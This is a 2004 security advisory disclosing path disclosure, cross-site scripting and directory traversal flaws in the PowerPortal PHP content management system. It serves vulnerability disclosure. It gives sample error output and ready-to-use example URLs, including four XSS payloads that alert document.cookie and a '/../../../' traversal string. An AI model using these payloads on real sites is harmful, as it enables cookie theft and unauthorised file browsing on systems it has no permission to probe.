Multiple vulnerabilities PowerPortal
http://www.swp-zone.org/archivos/advisory-07.txt
-------------------------------------------------------------------------------------------------
:.: Multiple vulnerabilities PowerPortal :.:
PROGRAM: PowerPortal
HOMEPAGE: http://powerportal.sourceforge.net/
VERSION: v1.x
BUG: Multiple vulnerabilities
DATE: 23/05/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Email: darkbicho@xxxxxxxx
-------------------------------------------------------------------------------------------------
1.- Affected software description:
------------------------------
PowerPortal is a popular content management system, written in php
2.- Vulnerabilities:
---------------
A. Full path disclosure:
This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive
information.
:.: Examples:
* http://attacker/modules/gallery/resize.php
<br />
<b>Warning</b>: imagecreatetruecolor(): Invalid image dimensions in
<b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
<b>18</b><br />
<br />
<b>Warning</b>: imagecopyresized(): supplied argument is not a
valid Image resource in
<b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
<b>20</b><br />
<br />
<b>Warning</b>: imagejpeg(): supplied argument is not a valid Image
resource in
<b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
<b>23</b><br />
* http://attacker/power/modules.php?name=gallery&files=darkbicho
Warning:
opendir(c:\appserv\www\power\modules\gallery/../../modules/gallery/images/darkbicho):
failed to open dir: Invalid argument in
c:\appserv\www\power\modules\gallery\index.php on
line 99
B. Cross-Site Scripting aka XSS:
http://attacker/modules.php?name=private_messages&file=reply&id='><script>alert(document.cookie);</script>
http://attacker/modules.php?name=links&search=<script>alert(document.cookie);</script>&func=search_results
http://attacker/modules.php?name=content&file=search&search=<script>alert(document.cookie);</script>&func=results
http://attacker/modules.php?name=gallery&files=<script>alert(document.cookie);</script>
C. Arbitrary directory browsing:
* http://attacker/modules.php?name=gallery&files=/../../../
3.- SOLUTION:
¨¨¨¨¨¨¨¨
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the PowerPortal website for updates and official release
details.
4.- Greetings:
---------
greetings to my Peruvian group swp and perunderforce :D
"EL PISCO ES Y SERA PERUANO"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho@xxxxxxxx
-------------------------------------------------------------------------------------------------
___________ ____________
/ _____/ \ / \______ \
\_____ \\ \/\/ /| ___/
/ \\ / | |
/_______ / \__/\ / |____|
\/ \/
Security Wari Projects
(c) 2002 - 2004
Made in Peru
----------------------------------------[ EOF
]----------------------------------------------
DarkBicho
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"
---------------------- The End ----------------------